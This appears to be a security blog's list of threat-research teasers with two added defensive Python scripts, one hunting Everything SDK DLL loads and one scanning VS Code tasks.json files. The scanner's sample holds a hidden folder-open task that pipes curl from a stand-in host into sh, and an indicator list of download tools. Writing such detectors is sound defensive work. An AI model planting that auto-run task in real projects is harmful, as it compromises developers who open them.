

Enigma Stealer Targets Cryptocurrency Industry with Fake Jobs
We discovered an active campaign targeting Eastern Europeans in the cryptocurrency industry using fake job lures.
In 2023, cybercriminals and defenders alike will have to move forward with caution in the face of a business landscape that’s fraught with security blindsides and economic ebbs and flows.
In this investigation, we analyzed several prominent "passive income" applications and found that participating in these programs may carry security risks.
We look into an ongoing malware campaign we named TgToxic, which has targeted Android users in Taiwan, Thailand, and Indonesia since July 2022. The malware steals users' credentials and assets such as cryptocurrency from digital wallets, as well as money from banking and finance apps. Analyzing the malware's automated features, we found that the threat actor abused the legitimate test framework Easyclick to write a JavaScript-based automation script for actions such as clicks and gestures.
We analyze an infection campaign targeting organizations in the Middle East for cyberespionage in December 2022 using a new backdoor malware. The campaign abuses legitimate but compromised email accounts to send stolen data to external mail accounts controlled by the attackers.
We analyze a BEC campaign targeting large companies around the world that was leveraging open-source tools to stay under the radar.
Trend Micro researchers discovered a new ransomware that abuses the APIs of Everything, a legitimate Windows filename search engine developed by Voidtools that offers fast searching and real-time index updates with minimal resource usage.
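The abuse described above leaves a simple hunting signal: the Everything SDK is meant to be loaded by Everything's own process, so any other process loading it deserves a look. The following is an added example, not code from the original article or from Voidtools, that runs that logic over a few constructed Sysmon-style Event ID 7 (Image loaded) records. It assumes the SDK DLL names Everything32.dll and Everything64.dll and a simplified key=value field layout; the events and paths are made up.

```python
"""Hunt for processes other than Everything.exe that load the Everything SDK DLLs.

Added example, not from the original article.  Assumptions: the SDK ships as
Everything32.dll / Everything64.dll, and events carry Sysmon-like fields
(Image, ImageLoaded, Signed).  The sample events below are constructed."""
from __future__ import annotations

import ntpath
import re

EVERYTHING_DLLS = {"everything32.dll", "everything64.dll"}
EXPECTED_HOST = "everything.exe"          # the only process expected to load the SDL
# Directories a dropped loader typically runs from (assumed list for the example).
USER_WRITABLE = re.compile(r"\\(temp|tmp|downloads|public)\\", re.I)

# Constructed Sysmon Event ID 7 records, flattened to key=value pairs separated by '|'.
SAMPLE_EVENTS = [
    r"Image=C:\Program Files\Everything\Everything.exe|ImageLoaded=C:\Program Files\Everything\Everything64.dll|Signed=true",
    r"Image=C:\Users\victim\AppData\Local\Temp\update.exe|ImageLoaded=C:\Users\victim\AppData\Local\Temp\Everything32.dll|Signed=false",
    r"Image=C:\Windows\System32\svchost.exe|ImageLoaded=C:\Windows\System32\ntdll.dll|Signed=true",
    r"Image=C:\Tools\indexer.exe|ImageLoaded=C:\Tools\Everything64.dll|Signed=true",
]


def parse_event(line: str) -> dict[str, str]:
    """Split one flattened record into a field dictionary."""
    return dict(kv.split("=", 1) for kv in line.split("|"))


def assess(event: dict[str, str]) -> dict | None:
    """Return a finding when a non-Everything process loads the SDK DLL, else None."""
    image = event.get("Image", "")
    loaded = event.get("ImageLoaded", "")
    if ntpath.basename(loaded).lower() not in EVERYTHING_DLLS:
        return None                              # unrelated DLL load
    host = ntpath.basename(image).lower()
    if host == EXPECTED_HOST:
        return None                              # Everything loading its own SDK is normal
    reasons = [f"{host} loaded {ntpath.basename(loaded)}"]
    if USER_WRITABLE.search(image):
        reasons.append("loader runs from a user-writable directory")
    if event.get("Signed", "").lower() != "true":
        reasons.append("loader image is unsigned")
    return {"image": image, "dll": loaded, "reasons": reasons}


def hunt(lines: list[str]) -> list[dict]:
    """Run assess() over every record and keep only the findings."""
    return [r for r in (assess(parse_event(line)) for line in lines) if r]


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding["image"], "->", "; ".join(finding["reasons"]))
```

On real telemetry the same check maps to a Sysmon or EDR query on the ImageLoaded field; the extra signals (unsigned loader, user-writable path) are there to rank hits, since a legitimate in-house tool built on the SDK will also trigger the base rule.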
In this proof of concept, we look into one of several attack vectors that can be abused to attack the software supply chain: targeting the developer. Focusing on the local integrated development environment (IDE), the proof of concept shows how malicious build scripts can execute, via injected commands, when a project or build is incorrectly marked as "trusted".
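One concrete form of the vector above is a task definition inside a cloned repository that the IDE runs as soon as the folder is trusted. The scanner below is an added example, not code from the original proof of concept: it parses a repository's VS Code tasks.json files and flags tasks configured with "runOnOptions": "runOn": "folderOpen" (a real VS Code setting) or whose command line carries download-and-execute indicators. The sample tasks.json and the indicator list are constructed for the example.

```python
"""Flag IDE build tasks that auto-run on folder open or look like droppers.

Added example, not from the original article.  Targets VS Code's
.vscode/tasks.json format (JSON with comments); the sample file and the
indicator patterns below are constructed assumptions, not a complete rule set."""
from __future__ import annotations

import json
import re
import tempfile
from pathlib import Path

AUTO_RUN_TRIGGERS = {"folderOpen"}        # VS Code runOptions.runOn value that fires on open

# Command-line fragments that rarely belong in a build step (assumed indicator list).
SUSPICIOUS_PATTERNS = [
    r"curl\s", r"wget\s", r"Invoke-WebRequest", r"\biwr\s", r"powershell",
    r"base64", r"\|\s*(sh|bash)\b", r"\$\(", r"certutil",
]

# Constructed sample: a normal build task plus a hidden task that runs on folder open.
SAMPLE_TASKS_JSON = r'''{
  // constructed sample, not a real project file
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
      "group": "build",
    },
    {
      "label": "prepare",
      "type": "shell",
      "command": "sh",
      "args": ["-c", "curl -s http://example.invalid/stage | sh"],
      "presentation": { "reveal": "never" },
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}'''


def _strip_jsonc(text: str) -> str:
    """tasks.json is JSON-with-comments: drop block comments, comment-only lines, trailing commas."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    return re.sub(r",(\s*[}\]])", r"\1", text)


def task_command(task: dict) -> str:
    """Flatten command plus args into one string for pattern matching."""
    parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
    return " ".join(parts).strip()


def scan_tasks(tasks_json: str) -> list[dict]:
    """Return one finding per task that auto-runs or matches an indicator."""
    data = json.loads(_strip_jsonc(tasks_json))
    findings = []
    for task in data.get("tasks", []):
        run_on = task.get("runOptions", {}).get("runOn")
        auto_run = run_on in AUTO_RUN_TRIGGERS
        cmd = task_command(task)
        hits = [p for p in SUSPICIOUS_PATTERNS if re.search(p, cmd, re.I)]
        if auto_run or hits:
            findings.append({
                "label": task.get("label", "<unnamed>"),
                "type": task.get("type"),
                "auto_run": auto_run,
                "command": cmd,
                "indicators": hits,
            })
    return findings


def scan_repo(root: Path) -> list[dict]:
    """Walk a checkout and scan every .vscode/tasks.json found."""
    results = []
    for tasks_file in sorted(root.rglob("tasks.json")):
        if tasks_file.parent.name != ".vscode":
            continue
        for finding in scan_tasks(tasks_file.read_text(encoding="utf-8")):
            finding["file"] = tasks_file.relative_to(root).as_posix()
            results.append(finding)
    return results


def demo() -> list[dict]:
    """Write the constructed sample into a temp checkout and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        vscode = Path(tmp) / "project" / ".vscode"
        vscode.mkdir(parents=True)
        (vscode / "tasks.json").write_text(SAMPLE_TASKS_JSON, encoding="utf-8")
        return scan_repo(Path(tmp))


if __name__ == "__main__":
    for f in demo():
        print(f["file"], f["label"], "auto_run=%s" % f["auto_run"], f["indicators"])
```

Running this in a pre-clone or pre-open hook gives a reviewer the list of tasks to read before granting trust; the "presentation": "reveal": "never" line in the sample is the kind of detail worth checking by hand, since it hides the terminal output of the task that runs.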
In this blog entry, we’d like to highlight our findings on Vice Society, which includes an end-to-end infection diagram that we were able to create using Trend Micro internal telemetry.